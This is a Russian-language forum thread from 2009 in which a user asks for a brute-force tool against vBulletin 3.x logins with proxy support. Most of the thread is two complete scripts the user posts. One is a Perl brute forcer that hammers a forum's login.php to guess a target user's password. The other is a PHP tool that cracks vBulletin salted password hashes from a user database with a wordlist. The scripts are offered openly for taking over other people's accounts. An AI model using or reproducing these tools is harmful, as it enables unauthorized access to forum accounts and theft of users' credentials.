Брут для vBulletin 3.х

Тема в разделе "Коммерческие", создана пользователем 1d37r, 23 янв 2009.

Информация :
Публиковать (для всех) нуленые версии, особенно от modulesgarden КАТЕГОРИЧЕСКИ не стоит. Тема мониторится оным разработчиком, а к нам приходят абузы которые нельзя игнорировать.
Статус темы:
Закрыта.
Модераторы: Amazko, Aste
  1. 1d37r

    1d37r Читатель

    Заблокирован
    Регистр.:
    16 сен 2007
    Сообщения:
    288
    Симпатии:
    48
    Ищу брут для vBulletin 3.х по списку пользователей с поддержкой прокси/соксов, желательно на язаках: perl или php
    тот брутер, что расположен здесь: http://www.nulled.ws/showthread.php?p=793901 уже не актуален

    p.s. модеры., вроде правильно прочитал правила :read:

    [upd]
    Нашел еще такой брутер, но он не работает со списком юзернеймов:
    Код:
    #!/usr/bin/perl
    
    use IO::Socket;
    use LWP::UserAgent;
    use HTTP::Cookies;
    use Time::HiRes qw(gettimeofday);
    
    $host = $ARGV[0];
    $usern = $ARGV[1];
    $passw = $ARGV[2];
    $uname = $ARGV[3];
    $url = "http://".$host;
    $alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
    $charcount = 24; #number of chars in $alpha
    $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
    $count = 0;
    $logins = 0;
    $minchars = 1; #min chars
    $maxchars = 10; #max chars
    
    print q(
    ##################################################  #########
    #                vBulletin brute forcer                   #
    #              http://www.unnamedone.com                  #
    #               brian_denys@hotmail.com                   #
    #                  09 - April - 2008                      #
    ################## Coded By UnnamedOne ####################
    );
    
    if (@ARGV < 4)
    {
       print " #  I am not responsible for anything that you do with this!\n";
       print " #  This has been tested on vBulletin 3.6.8 and 3.7.0!\n";
       print " #  usage : vbrute.pl [host & path] [user] [pass] [target]\n";
       print " #  E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";
       exit();
    }
    
    fakelogin();
    for(my $t=$minchars;$t<=$maxchars;$t++)
    {
       crack($t);
    }
    
    sub fakelogin {
       $xplr = LWP::UserAgent->new() or die;
       $cookie_jarr = HTTP::Cookies->new();
       $xplr->cookie_jar( $cookie_jarr );
       $resr = $xplr->post($url.'login.php?do=login',
       Content => [
       "vb_login_username"   => "$usern",
       "vb_login_password"   => "$passw",
       "do"      => "login",
       ],);
       if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
          #Do nothing..
       }
       else
       {
          #print $cookie_jarr->as_string;
          print "Forum not vulnerable or wrong username / password.\n";
          exit();
       }
    }
    
    sub crack {
       $xpl = LWP::UserAgent->new() or die;
       $cookie_jar = HTTP::Cookies->new();
       $CharSet = shift;
       @RawString = ();
       for (my $i =0;$i<$CharSet;$i++) {
          $RawString[i] = 0;
       }
       $Start = gettimeofday();
       do {
          for (my $i =0;$i<$CharSet;$i++)
          {
             if ($RawString[$i] > length($alpha)-1) {
                if ($i==$CharSet-1) {
                   $cnt = 0;
                   return false;
                }
                $RawString[$i+1]++;
                $RawString[$i]=0;
             }
          }
          $ret = "";
          for (my $i =0;$i<$CharSet;$i++) {
             $ret = $ret . substr($alpha,$RawString[$i],1);
          }
          $count++;
          if($count == 4) {
             fakelogin();
             $count = 0;
          }
          $xpl->cookie_jar( $cookie_jar );
          $res = $xpl->post($url.'login.php?do=login',
          Content => [
          "vb_login_username"   => "$uname",
          "vb_login_password"   => "$ret",
          "do"      => "login",
          ],);
          $cnt++;
          $Stop = gettimeofday();
          if ($Stop-$Start>$dbgtmr) {
             $cnt = int($cnt/$dbgtmr);
             $Start = gettimeofday();
          }
          $logins++;
          system("clear");
          $pro = ($logins / ($charcount * $maxchars));
          print "Current password: $ret\n";
          print "Login attempts: $logins\n";
          print "Cracking speed: $cnt passwords/sec\n";
          print "$pro% finished.\n";
          $cnt = 0;
          if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
             print "Password cracked! => $ret\n";
             exit();
    
          }
          $RawString[0]++;
       }while($RawString[$CharSet-1]<length($alpha));
    }
    Так же нашел еще брут для vBulletin на PHP, но его роботу я пока не разбирал, хотелось бы скрипт на perl, вот PHP брут:
    Код:
    <?
    ############################################################
    ## Author: M4k3                                           ##
    ## Script-Version: 1.0.2b                                 ##
    ## Script-Name: vb_tool.php                               ##
    ## Copyright: pldsecurity.de / .com /pldsoft.com          ##   
    ##                                                        ##
    ## Comment: Next Version coming soon, check               ##
    ## pldsecurity.com for Updates                            ##
    ############################################################
    
    # For Crack Option, you need: [vbulletin database] & [wordlist]
    # For Find Option, you need: [vbulletin database] 
    
    ###################### Set Error Reporting #################
    error_reporting(E_ALL & ~E_NOTICE);
    
    set_time_limit(60);
    
    # 60  for a database with 1000 Users
    # 180 for a database with 3000 Users
    ####################### Change Values ######################
    
    #MySQL Values
    $mysql[server] = 'localhost:3306';
    $mysql[username] = 'root';
    $mysql[password] = '';
    $mysql[database] = 'vbulletin';
    $mysql[table] = 'user';
    $mysql[page] = '20'; # Show 20 User / Site on User list
    
    #Script Values
    $script[wordlist] = 'word.txt';
    
    if(!file_exists($script[wordlist])) {
       $script[crack_option] = false;
    }
    
    $script[version]  = '1.0.2b';
    
    #############################################################
    
    ###################### Connection ###########################
    
    $mysql[connect] = mysql_connect($mysql[server], $mysql[username], $mysql[password])
                                   or die ("MySQL-Error: " .mysql_error());
    
    $mysql[connect_db] = mysql_select_db($mysql[database], $mysql[connect])
                                        or die ("MySQL-Error: " . mysql_error());
    
    #############################################################
    
    function check_table() {
       global $mysql;
    
       $query = mysql_query("Select * from ".$mysql[table]."")
                           or die ("MySQL-Error: " . mysql_error());
       if(!mysql_error()) {
          return 1;
       }
    }
    
    function find_password($_POST) {
       global $mysql;
    
       $query = mysql_query("Select * from ".$mysql[table]."")
                           or die ("MySQL-Error: " . mysql_error());
    
       while($user = mysql_fetch_array($query)) {
          $script[get_salt] .= $user[salt].htmlentities('<r>');
       }
    
       $script[salt] = explode(htmlentities('<r>'), $script[get_salt]);
    
    
       $query = mysql_query("Select * from ".$mysql[table]."")
                           or die ("MySQL-Error: " . mysql_error());
    
       while($user = mysql_fetch_array($query)) {
    
          for($i=0;$i<=sizeof($script[salt]);$i++) {
             if(md5(md5(rtrim($_POST['password'])).$script[salt][$i]) == $user[password]) {
                print 'Password found! Username: '.$user[username].' Userid: '.$user[userid].'<br>';
                flush();
             }
          }
       }
    }
    
    function crack_password($_POST) {
       global $script;
       global $mysql;
    
       $query = mysql_query("Select * from ".$mysql[table]." where username = '".addslashes($_POST['username'])."'")
                            or die ("MySQL-Error: " . mysql_error());
       $user = mysql_fetch_array($query);
    
       if(!is_array($user)) {
          print 'The User with the name <b>'.addslashes($_POST['username']).'</b> doesn\'t exist.<br>
                 <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
       } else {
          $file = fopen($script[wordlist], 'r');
    
          while(!feof($file)) {
    
             $word = fgets($file, 4096);
             
             if(md5(md5(rtrim($word)).$user[salt]) == $user[password]) {
                print 'Password Cracked! Password is <b>'.$word.'</b>';
                $cracked = true;
             } 
    
          }
          if($cracked == false) {
             print 'Failed to Crack Password.';
          }
          fclose($file);
       }
    }
    
    
    if(check_table() == 1) {
          print '<html>
                 <head>
                 <title>VBulletin Password Cracker</title>
                 <style type = "text/css">
                 body {
                    font-size: 11px;
                    text-align: center;
                 }
                 .option_table {
                    font-size: 11px;
                    border: 1px #000000 solid;
                    width: 300px;
                 }
                 .main_table {
                    font-size: 11px;
                    border: 1px #000000 solid;
                    width: 350px;
                 }
                 .user_table {
                    font-size: 11px;
                    text-align: center;
                    border: 0px #000000 solid;
                 }
                 .show_user {
                    border: 1px #000000 solid;
                    width: 125px;
                 }
                 .input_text {
                    font-size: 11px;
                 }
                 .input_submit {
                    color: #ffffff;
                    font-size: 11px;
                    border: 1px #000000 solid;
                    background-color: #000000;
                 }
                 a:link {
                    color: #000000;
                    text-decoration: none;
                 }
                 a:hover {
                    color: #000000;
                    text-decoration: underline overline;
                 }
                 </style>
                 </head>
                 <body>';
    
    
       if(empty($_GET['crack_option']) && empty($_GET['find_option']))  {
          print '<form method = "get">
                 <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "option_table">
                  <tr>
                   <td colspan = "2" align = "center">
                    <b>vbulletin password cracker & finder '.$script[version].'</b><br>
                    <hr size = "1" style = "border: 1px #000000 solid;"
                  </td>
                 </tr>
                  <tr>
                   <td>';
          if($script[crack_option] !== false) {
             print '<input type = "checkbox" name = "crack_option">';
          } else {
             print '<input type = "checkbox" name = "crack_option" disabled>';
          }
          print '</td>
                   <td>
                    Use "Crack Password" Option
                  </td>
                 </tr>
                  <tr>
                   <td>
                    <input type = "checkbox" name = "find_option">
                  </td>
                   <td>
                    Use "Find Password" Option
                  </td>
                 </tr>
                  <tr>
                   <td colspan = "2" align = "center">
                    <hr size = "1" style = "border: 1px #000000 solid;"
                    <input type = "submit" value = "Run Option" class = "input_submit">
                  </td>
                 </tr>
                  <tr>
                   <td colspan = "2" align = "center">
                    &copy; Copyright by M4k3 <a href = "http://pldsecurity.com">PLDsecurity.com</a>
                  </td>
                 </tr>
                </table>
                </form>';
       }
    
    
       if($_GET['crack_option'] == 'on') {
    
          if($_GET['do'] == 'show_user') {
    
             print '<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "user_table">
                     <tr>
                      <td colspan = "2" class = "show_user">
                       Please select a username.
                     </td>
                    </tr>
                     <tr>
                      <td class = "show_user">
                       Userid
                     </td>
                      <td class = "show_user">
                       Username
                     </td>
                    </tr>';
    
             if(empty($_GET['start']) && empty($_GET['end'])) {
                $query = mysql_query("Select userid, username from ".$mysql[table]." limit 0, ".$mysql[page]."")
                                     or die ("MySQL-Error: " . mysql_error());
    
                while($show_user = mysql_fetch_array($query)) {
                   print '<tr>
                           <td class = "show_user">
                            '.$show_user[userid].'
                          </td>
                           <td class = "show_user">
                            <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
                             '.$show_user[username].'</a>
                          </td>
                         </tr>';
                }
    
             print '<tr>
                     <td colspan = "2" align = "right" class = "show_user">
                      <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$mysql[page].'&end='.$mysql[page].'">
                       Next Page >></a>
                    </td>
                   </tr>
                  </table>
                  <br><br>';
    
                print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
           
             } else {
    
                $query = mysql_query("Select userid, username from ".$mysql[table]." limit
                                     ".addslashes($_GET['start']).",".addslashes($_GET['end'])."")
                                     or die ("MySQL-Error: " . mysql_error());
    
                while($show_user = mysql_fetch_array($query)) {
                   print '<tr>
                           <td class = "show_user">
                            '.$show_user[userid].'
                          </td>
                           <td class = "show_user">
                            <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
                         '.$show_user[username].'</a>
                           </td>
                          </tr>';
                }
    
                $page[next] = $_GET['start'] + $mysql[page];
                $page[previous] = $_GET['start'] - $mysql[page];
    
                $query = mysql_query("Select count(*) from user")
                                    or die ("MySQL-Error: " . mysql_error());
                $mysql[table_count] = mysql_fetch_array($query);
    
                if($page[previous] < 0) {
                   print '<tr>
                           <td colspan = "2" align = "right" class = "show_user">
                           <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[page].'">
                            Next Page >></a>
                          </td>
                         </tr>
                        </table>
                       <br><br>';
                } elseif($page[next] > $mysql[table_count][0]) {
                   print '<tr>
                           <td colspan = "2" align = "left" class = "show_user">
                           <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[page].'">
                            << Previous Page</a>
                          </td>
                         </tr>
                        </table>
                       <br><br>';
                } else {
                   print '<tr>
                           <td align = "left" class = "show_user">
                            <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[page].'">
                            << Previous Page</a>
                          </td>
                           <td align = "right" class = "show_user">
                            <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[page].'">
                            Next Page >></a>
                          </td>
                         </tr>
                        </table>
                        <br><br>';
                }
                print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
             }
    
          } elseif($_GET['do'] == 'crack_password' && !empty($_POST['username'])) {
               
             crack_password($_POST);
    
          } else {
    
            print '<form action = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=crack_password" method = "post">
                   <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
                    <tr>
                     <td colspan = "2" align = "center">
                      Insert a username or use the function "show user list"
                      <hr size = "1" style = "border: 1px #000000 solid;">
                    </td>
                   </tr>
                    <tr>
                     <td>
                      Username:
                    </td>
                     <td>';
            if($_GET['do'] == 'get_user' && !empty($_GET['username'])) {
               print '<input type = "text" name = "username" value = "'.$_GET['username'].'" size = "30"
                       class = "input_text">';
            } else {
               print '<input type = "text" name = "username" size = "30" class = "input_text">';
            }
                     
            print '</td>
                   </tr>
                    <tr>
                     <td colspan = "2" align = "center">
                      <input type = "submit" value = "Crack Password" class = "input_submit">
                    </td>
                   </tr>
                    <tr>
                     <td colspan = "2" align = "center">
                      <hr size = "1" style = "border: 1px #000000 solid;">
                      <a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user">show user list</a>
                    </td>
                   </tr>
                  </table>
                 </form>
                 <br><br>
                 <a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
    
          }
    
       } elseif($_GET['find_option'] == 'on') {
     
          if($_GET['do'] == 'find_password' && !empty($_POST['password'])) {
             print 'Searching...<br>';
             flush();
             find_password($_POST);
          } else {
             print '<form action = "'.$_SERVER[PHP_SELF].'?find_option=on&do=find_password" method = "post">
                    <table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
                     <tr>
                      <td colspan = "2" align = "center">
                       Please insert a password.
                       <hr size = "1" style = "border: 1px #000000 solid;">
                     </td>
                    </tr>
                     <tr>
                      <td>
                       Password:
                     </td>
                      <td>
                       <input type = "text" name = "password" size = "30" class = "input_text">
                     </td>   
                    </tr>
                     <tr>
                      <td colspan = "2" align = "center">
                       <input type = "submit" value = "Find Password" class = "input_submit">
                     </td>
                    </tr>
                   </table>
                   </form>
                   <br><br>
                   <a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
          }
    
       }
    
       print '<br><br>
             </body>
            </html>';
    
    }
    
    ?>
     
Статус темы:
Закрыта.